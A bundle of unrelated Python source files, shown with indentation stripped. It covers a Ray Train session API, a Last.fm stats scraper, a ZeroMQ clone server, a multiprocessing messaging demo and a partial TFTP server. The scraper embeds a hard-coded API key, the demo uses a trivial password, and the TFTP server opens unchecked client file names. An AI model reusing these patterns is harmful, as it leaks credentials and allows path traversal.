# This will raise any errors that occur during training, including
# SystemError
func_output = self.training_thread.join()
# If training finished successfully, then return results.
return func_output
def get_next(self) -> Optional[TrainingResult]:
"""Gets the next ``TrainingResult`` from the result queue.
If the result queue is empty, then this function returns ``None``.
"""
if not self.training_started:
raise RuntimeError("Please call start before calling get_next.")
result = None
# While training is still ongoing, attempt to get the result.
while result is None and self.training_thread.is_alive():
try:
result = self.result_queue.get(
block=True, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# If no result was found, then the runner must no longer be alive.
if result is None:
# Try one last time to fetch results in case results were
# reported in between the time of the last check and the
# termination of the thread runner.
try:
result = self.result_queue.get(
block=False, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# Release the lock to trigger training to continue.
self.continue_lock.release()
# Return None if there are no more results to fetch.
return result
def _auto_fill_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_time = time.time()
current_datetime = datetime.now()
if TIME_THIS_ITER_S in result:
time_this_iter = result[TIME_THIS_ITER_S]
else:
time_this_iter = current_time - self.last_report_time
self.iteration += 1
self.time_total += time_this_iter
self.last_report_time = current_time
auto_filled_metrics = {
DATE: current_datetime.strftime("%Y-%m-%d_%H-%M-%S"),
TIMESTAMP: int(time.mktime(current_datetime.timetuple())),
TIME_THIS_ITER_S: time_this_iter,
TIME_TOTAL_S: self.time_total,
PID: os.getpid(),
HOSTNAME: platform.node(),
NODE_IP: self.local_ip,
TRAINING_ITERATION: self.iteration
}
if not self.detailed_autofilled_metrics:
auto_filled_metrics = {
k: v
for k, v in auto_filled_metrics.items()
if k not in DETAILED_AUTOFILLED_KEYS
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def report(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread."""
if self.ignore_report:
return
kwargs = self._encode_data_fn(self._auto_fill_metrics(kwargs))
result = TrainingResult(TrainingResultType.REPORT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until main thread
# triggers resume.
self.continue_lock.acquire()
def _auto_fill_checkpoint_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_datetime = datetime.now()
auto_filled_metrics = {
TIMESTAMP: int(time.mktime(current_datetime.timetuple()))
}
result = result.copy()
result.update(auto_filled_metrics)
return result
def checkpoint(self, **kwargs):
"""Adds kwargs to the queue to be consumed by main thread.
Also stores the checkpoint in ``self.loaded_checkpoint``.
"""
# Update session checkpoint to latest checkpoint.
self.loaded_checkpoint = kwargs
# Only store checkpoints on worker with rank 0.
if self.world_rank != 0:
kwargs = {}
else:
kwargs = self._encode_data_fn(
self._auto_fill_checkpoint_metrics(kwargs))
result = TrainingResult(TrainingResultType.CHECKPOINT, kwargs)
# Add result to a thread-safe queue.
self.result_queue.put(result, block=True)
# Acquire lock to stop the training thread until
# checkpoint has been processed.
self.continue_lock.acquire()
_session = None
def init_session(*args, **kwargs) -> None:
global _session
if _session:
raise ValueError("A Train session is already in use. Do not call "
"`init_session()` manually.")
_session = Session(*args, **kwargs)
def get_session() -> Session:
global _session
if _session is None or not isinstance(_session, Session):
raise ValueError("Trying to access a Train session that has not been "
"initialized yet. Train functions like "
"`train.report()` should only be called from inside "
"the training function.")
return _session
def shutdown_session():
"""Shuts down the initialized session."""
global _session
_session = None
@PublicAPI(stability="beta")
def get_dataset_shard(
dataset_name: Optional[str] = None) -> Optional[RayDataset]:
"""Returns the Ray Dataset or DatasetPipeline shard for this worker.
You should call ``to_torch()`` or ``to_tf()`` on this shard to convert
it to the appropriate framework-specific Dataset.
.. code-block:: python
import ray
from ray import train
def train_func():
model = Net()
for iter in range(100):
data_shard = train.get_dataset_shard().to_torch()
model.train(data_shard)
return model
dataset = ray.data.read_csv("train.csv")
dataset.filter(...).repeat().random_shuffle()
trainer = Trainer(backend="torch")
trainer.start()
# Trainer will automatically handle sharding.
train_model = trainer.run(train_func, dataset=dataset)
trainer.shutdown()
Args:
dataset_name (Optional[str]): If a Dictionary of Datasets was passed to
``Trainer``, then specifies which dataset shard to return.
Returns:
The ``Dataset`` or ``DatasetPipeline`` shard to use for this worker.
If no dataset is passed into Trainer, then return None.
"""
session = get_session()
shard = session.dataset_shard
if shard is None:
warnings.warn("No dataset passed in. Returning None. Make sure to "
"pass in a Ray Dataset to Trainer.run to use this "
"function.")
elif isinstance(shard, dict):
if not dataset_name:
raise RuntimeError(
"Multiple datasets were passed into ``Trainer``, "
"but no ``dataset_name`` is passed into "
"``get_dataset_shard``. Please specify which "
"dataset shard to retrieve.")
return shard[dataset_name]
return shard
@PublicAPI(stability="beta")
def report(**kwargs) -> None:
"""Reports all keyword arguments to Train as intermediate results.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.report(hello="world")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be reported by Train.
If callbacks are provided, they are executed on these
intermediate results.
"""
session = get_session()
session.report(**kwargs)
@PublicAPI(stability="beta")
def world_rank() -> int:
"""Get the world rank of this worker.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
if train.world_rank() == 0:
print("Worker 0")
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.world_rank
@PublicAPI(stability="beta")
def local_rank() -> int:
"""Get the local rank of this worker (rank of the worker on its node).
.. code-block:: python
import time
from ray import train
def train_func():
if torch.cuda.is_available():
torch.cuda.set_device(train.local_rank())
...
trainer = Trainer(backend="torch", use_gpu=True)
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.local_rank
@PublicAPI(stability="beta")
def load_checkpoint() -> Optional[Dict]:
"""Loads checkpoint data onto the worker.
.. code-block:: python
from ray import train
def train_func():
checkpoint = train.load_checkpoint()
for iter in range(checkpoint["epoch"], 5):
print(iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func, checkpoint={"epoch": 3})
# 3
# 4
trainer.shutdown()
Args:
**kwargs: Any key value pair to be checkpointed by Train.
Returns:
The most recently saved checkpoint if ``train.save_checkpoint()``
has been called. Otherwise, the checkpoint that the session was
originally initialized with. ``None`` if neither exist.
"""
session = get_session()
return session.loaded_checkpoint
@PublicAPI(stability="beta")
def save_checkpoint(**kwargs) -> None:
"""Checkpoints all keyword arguments to Train as restorable state.
.. code-block:: python
import time
from ray import train
def train_func():
for iter in range(100):
time.sleep(1)
train.save_checkpoint(epoch=iter)
trainer = Trainer(backend="torch")
trainer.start()
trainer.run(train_func)
trainer.shutdown()
Args:
**kwargs: Any key value pair to be checkpointed by Train.
"""
session = get_session()
session.checkpoint(**kwargs)
@PublicAPI(stability="beta")
def world_size() -> int:
"""Get the current world size (i.e. total number of workers) for this run.
.. code-block:: python
import time
from ray import train
def train_func():
assert train.world_size() == 4
trainer = Trainer(backend="torch", num_workers=4)
trainer.start()
trainer.run(train_func)
trainer.shutdown()
"""
session = get_session()
return session.world_size
|
lasthopold.py
|
import os
import json
import math
import urllib.request, urllib.error, urllib.parse
import requests
import multiprocessing
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from shared.set_username import SetUsername
from shared.config import Config
def go():
LastHop.run()
class LastHop:
def __init__(self, username, real_name, join_date, total_tracks):
self.timezone_diff = self.get_timezone_diff()
self.join_date = join_date.date()
self.stats_date = datetime.today()
self.username = username
self.real_name = real_name if real_name else self.username
self.total_tracks = int(total_tracks)
self.avg_daily_tracks = (
self.total_tracks / (self.stats_date.date() - self.join_date).days
)
self.user_profile = "https://www.last.fm/user/{user}/library".format(
user=username
)
self.file_path = os.path.dirname(
os.path.realpath(__file__)
) + "/users/{username}".format(username=username)
if not os.path.exists(self.file_path):
os.makedirs(self.file_path)
@staticmethod
def get_timezone_diff():
"""
Get difference in hours from UTC timezone. Daylight savings makes this variable.
:return: Timezone diff in hours
"""
return datetime.now().hour - datetime.utcnow().hour
def get_date_filename(self, date):
"""
Get file name for given day
"""
if isinstance(date, datetime):
date = date.date()
print(type(date))
# print( "{path}/{date}.csv".format(path=self.file_path, date=date))
return "{path}/{date}.csv".format(path=self.file_path, date=date)
def user_stats(self):
print(
"{user} has been on Last.fm for {years} years "
"\nThey've played {total_tracks} tracks \n"
"That's an average of {avg} track{s} per day.".format(
user=self.real_name,
years=(self.stats_date.year - self.join_date.year),
total_tracks="{:,}".format(self.total_tracks),
avg=int(self.avg_daily_tracks),
s="s" if self.avg_daily_tracks > 1 else "",
)
)
def music_stats(self):
print(
"- - - - - - - - - - - - - {date} - - - - - - - - - - - - - -".format(
date=self.stats_date.date().strftime("%B %-d")
)
)
print("- - - - - - - - - - Most Played Artists - - - - - - - - - -")
self.yearly_most_played_artists()
print("\n- - - - - - - - - Played around this time - - - - - - - - -")
# self.yearly_around_this_time()
print("\n- - - - - - - - - - - All Artists - - - - - - - - - - - - -")
# self.yearly_all_artists()
print("- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
# if self.stats_date.date() == datetime.today().date() and datetime.today().time().hour < 2:
# try:
# day_file_path = self.get_date_filename(self.stats_date.date())
# os.remove(day_file_path)
# except OSError:
# pass
def process_day(self, date):
"""
Scrapes the user profile for this day on each year since joining last.fm
:param date: Date to process and write files for
:param prev: Is this the day before? Used for timezone difference. I know it's hideous.
:return: dictionary of artist and track information
"""
today_file_path = self.get_date_filename(date.date())
print(today_file_path)
tracks_and_dates_list = []
page = 1
date_start = (
date.replace(hour=0)
.replace(minute=0)
.replace(second=0)
.replace(microsecond=0)
)
date_start_epoch = int(date_start.timestamp())
date_end_epoch = int(
date_start.replace(hour=23)
.replace(minute=59)
.replace(second=59)
.timestamp()
)
api_url = (
f"http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"
f"&user={self.username}&"
f"api_key=8257fbe241e266367f27e30b0e866aba&"
f"&from={date_start_epoch}"
f"&to={date_end_epoch}"
f"&limit=200"
f"&page=1"
f"&format=json"
)
response = requests.get(api_url).json()
recenttracks = response.get("recenttracks", {}).get("track")
total_track_count = response.get("recenttracks", {}).get("total", 0)
# if total_track_count == 0:
# today_file = open(today_file_path, 'w+')
# today_file.write("0")
# today_file.close()
# return []
num_pages = math.ceil(total_track_count / 200)
tracks_and_dates = []
artist_track_date_map = {}
if num_pages > 1:
for page_num in range(2, num_pages + 1):
api_url = (
f"http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"
f"&user={self.username}&"
f"api_key=8257fbe241e266367f27e30b0e866aba&"
f"&from={date_start_epoch}"
f"&to={date_end_epoch}"
f"&limit=200"
f"&page={page_num}"
f"&format=json"
)
response = requests.get(api_url).json()
recenttracks.append(response.get("recenttracks", {}).get("track"))
for track in recenttracks:
artist = track.get("artist", {}).get("#text").replace(",", "")
title = track.get("name").replace(",", "")
play_date = track.get("date", {}).get("#text", datetime.now())
play_date_datetime = datetime.strptime(play_date, "%d %b %Y, %H:%M")
play_date_formatted = play_date_datetime.strftime("%Y/%m/%d %H:%M:%S")
with open(today_file_path, "w+") as stats_file:
stats_file.write(f"{artist},{title},{play_date_formatted}")
# today_file = open(today_file_path, 'w+')
# for key in artist_dict:
# today_file.write("{track}: {date}\n".format(track=key, date=artist_dict.get(key)))
# today_file.close()
# if artist_track_date_map.get()
# tracks_and_dates.append(f"{artist} - {title}: m[{play_date}]")
# print(tracks_and_dates)
#
# if artist_dict.get(tracks_and_dates[i]):
# date_list = artist_dict.get(tracks_and_dates[i])
# date_list.append(tracks_and_dates[i + 1])
# artist_dict[tracks_and_dates[i]] = date_list
# else:
# artist_dict[tracks_and_dates[i]] = [tracks_and_dates[i + 1]]
# tracks_and_dates_list.append({"track": tracks_and_dates[i], "date": tracks_and_dates[i + 1]})
# while True: # paging
# response = requests.get(api_url).json()
# if response.get("recenttracks", {}).get("total", 0) < 1:
# break
#
#
# url = '{user_profile}?rangetype=1day&from={date}&page={page}'.format(user_profile=self.user_profile,
# date=date,
# page=str(page))
# artist_dict = {}
# tracks_and_dates = []
# while True: # paging
# response = requests.get(url)
# if response.url != url:
# break
#
# if "didn't scrobble anything" in response.content:
# today_file = open(today_file_path, 'w+')
# today_file.write("0")
# today_file.close()
# return []
# lines = response.content.split('title="')[1:]
# tracks_and_dates = []
# for line in lines:
# l = line.split('">')[0].split("\n")[0]
# if l[0] is not " ":
# tracks_and_dates.append(l.replace('"', '').replace('&', '&'))
# for i in range(0, len(tracks_and_dates)):
# if '\xe2\x80\x94' in tracks_and_dates[i]:
# if (datetime.strptime(tracks_and_dates[i + 1], '%A %d %b %Y, %I:%M%p').time().hour > 21 and
# self.stats_date.date().day == date.day):
# continue
# else:
# if artist_dict.get(tracks_and_dates[i]):
# date_list = artist_dict.get(tracks_and_dates[i])
# date_list.append(tracks_and_dates[i + 1])
# artist_dict[tracks_and_dates[i]] = date_list
# else:
# artist_dict[tracks_and_dates[i]] = [tracks_and_dates[i + 1]]
# tracks_and_dates_list.append({"track": tracks_and_dates[i], "date": tracks_and_dates[i + 1]})
# page += 1
# url = '{user_profile}?rangetype=1day&from={date}&page={page}'.format(user_profile=self.user_profile,
# date=date,
# page=str(page))
# today_file = open(today_file_path, 'w+')
# for key in artist_dict:
# today_file.write("{track}: {date}\n".format(track=key, date=artist_dict.get(key)))
# today_file.close()
# return artist_dict
def write_day_file(self, date):
"""
Writes track data for one day
:param date:
:return:
"""
day_file_path = self.get_date_filename(date.date())
open(day_file_path, "ab+").close()
if (
not os.path.getsize(day_file_path) > 0
or date == datetime.today()
or (
date == datetime.today() - relativedelta(days=1)
and datetime.today().time().hour < self.timezone_diff
)
):
self.process_day(date)
return day_file_path
def write_all_files(self, year=None):
"""
Writes track data for each day on this day from join date until today
"""
date = self.stats_date
if year:
date = date.replace(year=year)
day_file_path = self.get_date_filename(date.date())
day_file_path = "{path}/{date}.csv".format(
path=self.file_path, date=date.date()
)
try:
open(day_file_path, "r+")
except IOError:
for f in os.listdir(self.file_path):
if os.path.isfile(f):
os.remove(f)
new_day = True
while True:
if self.timezone_diff == 0:
self.write_day_file(date)
else:
day_before = date - relativedelta(days=1)
day_before_file_path = self.get_date_filename(day_before)
try:
open(day_file_path, "r+")
except IOError:
new_day = True
try:
open(day_before_file_path, "r+")
except Exception:
new_day = True
self.write_day_file(date)
if new_day:
if self.timezone_diff != 0:
self.first_n_hours(date=date)
new_day = False
if year:
break
date = date - relativedelta(years=1)
if date < self.join_date:
break
@classmethod
def st_to_dict(cls, line):
track_dict = {}
if line == "0":
return 0
artist = line.split(":")[0]
time = line.split(":", 1)[1]
track_dict[artist] = time
return track_dict
def most_played_artist(self, date):
day_file_path = self.get_date_filename(date)
# print(day_file_path)
today_file = open(day_file_path, "r+")
track_dict = {}
artists = {}
for line in today_file:
if line == "\n":
continue
if line == "0":
return 0
track = line.split(":", 1)[0]
time = line.split(":", 1)[1]
if track_dict.get(track):
date_list = track_dict.get(track)
date_list.append(time.strip("["))
track_dict[track] = date_list
else:
track_dict[track] = [time]
for track in track_dict:
date_list = track_dict.get(track)
count = 0
for dat in date_list:
count += dat.count("am") + dat.count("pm")
track = track.split("\xe2\x80\x94")[0]
if track[0] == "0":
track = track[1:]
artists[track] = artists.get(track, 0) + count
day_list = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
weekday = day_list[date.weekday()]
today_file.close()
artist = (
max(artists, key=artists.get).replace("'", "`") if artists else None
)
count = artists.get(max(artists, key=artists.get)) if artist else 0
return "{date} ({weekday}): {artist} ({count})".format(
date=date.year, artist=artist, count=count, weekday=weekday
)
def yearly_most_played_artists(self):
date = self.stats_date.date()
while True:
most_played = self.most_played_artist(date)
if most_played:
print(most_played)
date = date - relativedelta(years=1)
if date < self.join_date:
break
@staticmethod
def seconds_to_time(seconds):
hours = seconds / 60
min = seconds % 60
return "{h}:{m}".format(h=hours, m=min)
def around_this_time(self, date):
day_file_path = self.get_date_filename(date)
# print(day_file_path)
# day_file_path = "{path}/{date}.csv".format(path=self.file_path, date=date.day())
day_file = open(day_file_path, "r+")
times = {}
now = self.stats_date
seconds_passed_today = now.hour * 60 + now.minute
track_dict = {}
track_time_dict = {} # maps seconds passed to actual play times
for line in day_file:
if line == "\n":
continue
if line == "0":
return 0
track = line.split(":")[0]
if track[0] == "0":
track = track[1:]
track_time_dict[track] = []
date = line.split(":", 1)[1].lstrip().rstrip()
if track_dict.get(track):
date_list = track_dict.get(track)
date_list.append(date)
track_dict[track] = date_list
else:
track_dict[track] = [date]
date_list = track_dict.get(track)
for date in date_list:
if len(date) > 33:
for i in date.split(","):
if len(i) < 12:
time = i[1:8]
if time[len(time) - 1 :] == "'":
time = time[:6]
time = datetime.strptime(time, "%I:%M%p") + relativedelta(
hours=self.timezone_diff
)
time = time.time()
seconds_passed = time.hour * 60 + time.minute
track_time_dict[seconds_passed] = time
times[seconds_passed] = track
else:
time = date[len(date) - 9 : len(date) - 2]
if time[0] == " ":
time = time[1:]
time = datetime.strptime(time, "%I:%M%p") + relativedelta(
hours=self.timezone_diff
)
time = time.time()
seconds_passed = time.hour * 60 + time.minute
track_time_dict[seconds_passed] = time
times[seconds_passed] = track
diff_times = {}
for s in list(times.keys()):
diff = abs(seconds_passed_today - int(s))
diff_times[times.get(s)] = diff
track = min(diff_times, key=diff_times.get) if diff_times else None
return {"track": track}
def yearly_around_this_time(self):
date = self.stats_date.date()
while True:
played_nowish = self.around_this_time(date)
if type(played_nowish) != dict:
break
if played_nowish.get("track"):
song = played_nowish.get("track").replace("'", "`")
else:
continue
if played_nowish:
print("{year}: {song}".format(year=date.year, song=song))
date = date - relativedelta(years=1)
if date < self.join_date:
break
def first_n_hours(self, date):
"""
When the response from last.fm is in a different time zone than ours,
we need to some some grotesque hacking.
:param date:
:return:
"""
day_before = date - relativedelta(days=1)
day_before_songs = self.write_day_file(day_before)
song_dict = {}
if type(day_before_songs) == str:
song_file = open(day_before_songs, "r+")
for song in song_file:
d = self.st_to_dict(song)
if d == 0:
return []
song_dict[list(d.keys())[0]] = list(d.values())[0]
else:
for song in day_before_songs:
if day_before_songs[0].get("track"):
date_list = song.get("date")
song_dict[song.get("track")] = date_list
else:
song_dict[song.get("track")] = [song.get("date")]
late_night_songs = {}
for song in song_dict:
times = song_dict.get(song)
times_played = []
late_night_songs[song] = []
for time in times.split("'"):
if "[" not in time and "]" not in time and len(time) > 3:
times_played.append(time)
if datetime.strptime(
time.lstrip().rstrip(), "%A %d %b %Y, %I:%M%p"
).time().hour >= (24 - self.timezone_diff):
late_night_songs[song].append(time)
day_file_path = self.get_date_filename(date)
day_file = open(day_file_path, "a+")
for song in late_night_songs:
if len(late_night_songs.get(song)) > 0:
line = "{song}: {time}\n".format(
song=song, time=late_night_songs.get(song)
)
day_file.write(line)
day_file.close()
return late_night_songs
def all_artists_that_day(self, date):
day_file_path = self.get_date_filename(date.date())
day_file = open(day_file_path, "r+")
track_dict = {}
artists = {}
for line in day_file:
if line == "\n":
continue
if line == "0":
return 0
track = line.split(":", 1)[0]
times = line.split(":", 1)[1]
if track_dict.get(track):
date_list = track_dict.get(track)
date_list.append(times)
track_dict[track] = date_list
else:
track_dict[track] = [times]
for track in track_dict:
times = track_dict.get(track)
play_count = 0
for dat in times:
play_count += dat.count("am") + dat.count("pm")
track = track.split("\xe2\x80\x94")[0]
if "0" in track[0]:
artists[track[1:]] = artists.get(track[1:], 0) + play_count
else:
artists[track] = artists.get(track, 0) + play_count
day_file.close()
return artists
def yearly_all_artists(self):
date = self.stats_date.date()
while True:
artists = self.all_artists_that_day(date)
if artists:
print("* - {year} - *".format(year=date.year))
for artist in sorted(artists, key=artists.__getitem__, reverse=True):
print(
"\t{artist}: {plays}".format(
artist=artist.replace("'", "`"),
plays=artists.get(artist),
)
)
total = 0
for count in artists:
total += artists.get(count)
print(" - \n\tTotal tracks: {total}".format(total=total))
date = date - relativedelta(years=1)
if date < self.join_date:
break
@classmethod
def run(cls):
start_time = datetime.now()
username = SetUsername.set_username()
print("Getting music stats for {0}".format(username))
user_data = get_lastfm_user_data(username)
lastfm_user = LastHop(
username=username,
real_name=user_data.get("real_name"),
join_date=user_data.get("join_date"),
total_tracks=user_data.get("total_tracks"),
)
lastfm_user.user_stats()
jobs = []
for i in range(user_data.get("join_date").year, datetime.today().year + 1):
p = multiprocessing.Process(target=lastfm_user.write_all_files, args=(i,))
jobs.append(p)
p.start()
for job in jobs:
job.join()
lastfm_user.stats_date = datetime.today()
lastfm_user.music_stats()
end_time = datetime.now()
total = end_time - start_time
print("(took {time} seconds)".format(time=total.seconds))
def get_lastfm_user_data(username):
api_key = Config.API_KEY
api_url = "http://ws.audioscrobbler.com/2.0/?method=user.getinfo&user={user}&api_key={api_key}&format=json".format(
user=username, api_key=api_key
)
api_response = json.loads(urllib.request.urlopen(api_url).read())
join_date = datetime.fromtimestamp(
float(api_response.get("user").get("registered").get("unixtime"))
)
real_name = api_response.get("user").get("realname")
total_tracks = api_response.get("user").get("playcount")
return {
"join_date": join_date,
"real_name": real_name,
"total_tracks": total_tracks,
}
if __name__ == "__main__":
LastHop.run()
|
clonesrv2.py
|
"""
Clone server Model Two
Author: Min RK <benjaminrk@gmail.com>
"""
import random
import threading
import time
import zmq
from kvsimple import KVMsg
from zhelpers import zpipe
def main():
# Prepare our context and publisher socket
ctx = zmq.Context()
publisher = ctx.socket(zmq.PUB)
publisher.bind("tcp://*:5557")
updates, peer = zpipe(ctx)
manager_thread = threading.Thread(target=state_manager, args=(ctx,peer))
manager_thread.daemon=True
manager_thread.start()
sequence = 0
random.seed(time.time())
try:
while True:
# Distribute as key-value message
sequence += 1
kvmsg = KVMsg(sequence)
kvmsg.key = "%d" % random.randint(1,10000)
kvmsg.body = "%d" % random.randint(1,1000000)
kvmsg.send(publisher)
kvmsg.send(updates)
except KeyboardInterrupt:
print " Interrupted\n%d messages out" % sequence
# simple struct for routing information for a key-value snapshot
class Route:
def __init__(self, socket, identity):
self.socket = socket # ROUTER socket to send to
self.identity = identity # Identity of peer who requested state
def send_single(key, kvmsg, route):
"""Send one state snapshot key-value pair to a socket
Hash item data is our kvmsg object, ready to send
"""
# Send identity of recipient first
route.socket.send(route.identity, zmq.SNDMORE)
kvmsg.send(route.socket)
def state_manager(ctx, pipe):
"""This thread maintains the state and handles requests from clients for snapshots.
"""
kvmap = {}
pipe.send("READY")
snapshot = ctx.socket(zmq.ROUTER)
snapshot.bind("tcp://*:5556")
poller = zmq.Poller()
poller.register(pipe, zmq.POLLIN)
poller.register(snapshot, zmq.POLLIN)
sequence = 0 # Current snapshot version number
while True:
try:
items = dict(poller.poll())
except (zmq.ZMQError, KeyboardInterrupt):
break # interrupt/context shutdown
# Apply state update from main thread
if pipe in items:
kvmsg = KVMsg.recv(pipe)
sequence = kvmsg.sequence
kvmsg.store(kvmap)
# Execute state snapshot request
if snapshot in items:
msg = snapshot.recv_multipart()
identity = msg[0]
request = msg[1]
if request == "ICANHAZ?":
pass
else:
print "E: bad request, aborting\n",
break
# Send state snapshot to client
route = Route(snapshot, identity)
# For each entry in kvmap, send kvmsg to client
for k,v in kvmap.items():
send_single(k,v,route)
# Now send END message with sequence number
print "Sending state shapshot=%d\n" % sequence,
snapshot.send(identity, zmq.SNDMORE)
kvmsg = KVMsg(sequence)
kvmsg.key = "KTHXBAI"
kvmsg.body = ""
kvmsg.send(snapshot)
if __name__ == '__main__':
main()
|
python3-54.py
|
#Communicating with processes
#Real time communications with processes
#Even on other machines
#Imports
import logging
import time
import multiprocessing
from multiprocessing import process
from multiprocessing.context import Process
from multiprocessing.connection import Listener, Client
logging.basicConfig(format='%(levelname)s - %(asctime)s: %(message)s',datefmt='%H:%M:%S', level=logging.DEBUG)
#Worker process
def proc(server='localhost',port=6000, password=b'password'):
name = process.current_process().name
logging.info(f'{name} stated')
#Start listening for connections
address = (server,port)
listener = Listener(address,authkey=password)
conn = listener.accept()
logging.info(f'{name}: connection from {listener.last_accepted}')
#Loop for input from the connected process
while True:
msg = conn.recv()
logging.info(f'{name} data in: {msg}')
if msg == 'quit':
conn.close()
break
listener.close()
logging.info(f'{name} finished')
#Main Function
def main():
name = process.current_process().name
logging.info(f'{name} started')
#Setup the process
address = 'localhost' #127.0.0.1
port = 2823 # above 1024
password = b'password'
p = Process(target=proc,args=[address,port,password],daemon=True,name="Worker")
p.start()
logging.info(f'{name} waiting on the worker...')
time.sleep(1)
#Connect to the process
dest = (address,port)
conn = Client(dest,authkey=password)
#Command loop
while True:
command = input('\r\nEnter a command or type quit:\r\n').strip()
logging.info(f'{name} command: {command}')
conn.send(command)
if command == 'quit':
break
#Cleanup and shutdown
if p.is_alive:
logging.info(f'{name} terminating worker')
conn.close()
time.sleep(1)
p.terminate()
p.join()
logging.info(f'{name} finished')
if __name__ == "__main__":
main()
|
tftp.py
|
# import click
from socket import AF_INET, SOCK_DGRAM, socket
from struct import unpack, pack
from threading import Thread
from zipfile import ZipFile
import io
import os
from piman import logger
"""
This code is modified following Prof. Reed suggestion
"""
"""
The TFTPServer class encapsulates the methods required for running a simple TFTP server that handles only read requests
The server is initialized with a data directory, a port, as well as a connection address
Data directory, port and connection address is specified in the configuration file
(note: sudo must be used if using port 69)
"""
class TFTPServer:
RRQ_OPCODE = 1
DATA_OPCODE = 3
ACK_OPCODE = 4
ERROR_OPCODE = 5
OACK_OPCODE = 6
# TFTP data packets consist of a 2-byte opcode, 2-byte block number, and up to 512-byte data portion
# Although we could minimize since our server is solely getting RRQ and Ack packets we could have set
# the buffer to a more optimized value (i.e. filenames on Mac OSX can have up to 256 characters so we
# could limit the buffer to the max size of a RRQ packet) but for better practice it's been set to the
# max data packet length in TFTP
BUFFER_SIZE = 516
# ctor for setting configurable attributes
def __init__(self, data_dir, tftp_port, connection_address):
self.data_dir = data_dir
self.tftp_port = tftp_port
self.connection_address = connection_address
# opens install/boot in zipfile
def res_open(self, name):
zipfile = os.path.dirname(os.path.dirname(__file__))
fd = None
try:
with ZipFile(zipfile) as z:
fd = z.open("install/boot/" + name)
except KeyError:
logger.error("{}: key error - looking in filesystem next".format(name))
pass # we'll try looking in the filesystem next
if not fd:
fd = open("{}/{}".format(self.data_dir, name), "rb")
if 'cmdline.txt' in name and fd:
# we need to fixup the master address
content = fd.read()
fd.close()
fd = io.BytesIO(content.replace(b'MASTER', self.connection_address.encode()))
return fd
"""
Begins running the server thread
"""
def start(self):
self.server_socket = socket(AF_INET, SOCK_DGRAM)
# We can specify a specific address when running the server (defaults to '')
logger.info("connecting to {}:{}".format(self.connection_address, self.tftp_port))
self.server_socket.bind((self.connection_address, self.tftp_port))
logger.info("serving files from {} on port {}".format(self.data_dir, self.tftp_port))
self.tftp_thread = Thread(target=self.__process_requests, name="tftpd")
self.tftp_thread.start()
def stop(self):
self.server_socket.close()
"""
This code is responsible for handling requests (both valid and invalid) as well as ensuring data is transferred
properly and reliably.
"""
def __process_requests(self):
# this while loop keeps our server running also accounting for ensuring the initial
# data packet is retrieved by the host
# accepts RRQ's for files and starts a thread to proccess it
logger.info("TFTP waiting for request")
while True:
pkt, addr = self.server_socket.recvfrom(self.BUFFER_SIZE)
t1 = Thread(
target=self.__create_thread_and_process_requests, args=(pkt, addr))
t1.daemon = True
t1.start()
"""
This code is responsible for handling requests. It starts a new socket with an ephemeral port
for communication to the client. If no response is heard after 10 seconds, the socket is closed and function ends.
"""
def __create_thread_and_process_requests(self, pkt, addr):
# initial block number and variable for filename
block_number = 0
filename = ''
# prepare the UDP socket
client_dedicated_sock = socket(AF_INET, SOCK_DGRAM)
# bind to 0 for an ephemeral port
client_dedicated_sock.bind((self.connection_address, 0))
# set timeout for the socket
client_dedicated_sock.settimeout(10)
# RRQ is a series of strings, the first two being the filename
# and mode but there may also be options. see RFC 2347.
#
# we skip the first 2 bytes (the opcode) and split on b'\0'
# since the strings are null terminated.
#
# because b'\0' is at the end of all strings split will always
# give us an extra empty string at the end, so skip it with [:-1]
strings_in_RRQ = pkt[2:].split(b"\0")[:-1]
logger.info("got {} from {}".format(strings_in_RRQ, addr))
filename = strings_in_RRQ[0]
# opens the file once for the socket, opening multiple times causes tftp to be slow
try:
transfer_file = self.res_open(strings_in_RRQ[0].decode())
while True:
# the first two bytes of all TFTP packets is the opcode, so we can
# extract that here. the '!' is for big endian, and 'H' is to say it is an integer
[opcode] = unpack("!H", pkt[0:2])
if opcode == TFTPServer.RRQ_OPCODE:
if len(strings_in_RRQ) > 4:
for index, string in enumerate(strings_in_RRQ[2:]):
if string.decode() == 'tsize':
temp_file = self.res_open(filename.decode())
temp_file.seek(0, 2)
t_size = temp_file.tell()
if string.decode() == 'blksize':
block_size = int(strings_in_RRQ[index + 1])
#construct oack
transfer_ack_opcode = pack("!H", TFTPServer.OACK_OPCODE)
oack_data = 'tsize'.encode() + b'\0' + pack("!I", t_size) + b'\0'
oack_data += 'block_size'.encode() + b'\0' + pack("!H", block_size) + b'\0'
packet = transfer_ack_opcode + oack_data
client_dedicated_sock.sendto(packet, addr)
# set the opcode for the packet we are sending
transfer_opcode = pack("!H", TFTPServer.DATA_OPCODE)
# read up to the appropriate 512 bytes of data
if len(strings_in_RRQ) > 4:
data = transfer_file.read(block_size)
else:
data = transfer_file.read(512)
# if data is received increment block number, contruct the packet, and send it
if data:
block_number += 1
transfer_block_number = pack("!H", block_number)
packet = transfer_opcode + transfer_block_number + data
client_dedicated_sock.sendto(packet, addr)
# ACK received, so we can now read the next block, if it doesn't match resend the previous block of data
elif opcode == TFTPServer.ACK_OPCODE:
[acked_block] = unpack("!H", pkt[2:4])
# block number matches, the block sent was successfully received
if acked_block == block_number:
data = transfer_file.read(512)
# if data read, increment block number, construct packet, and send it on the socket
if data:
block_number += 1
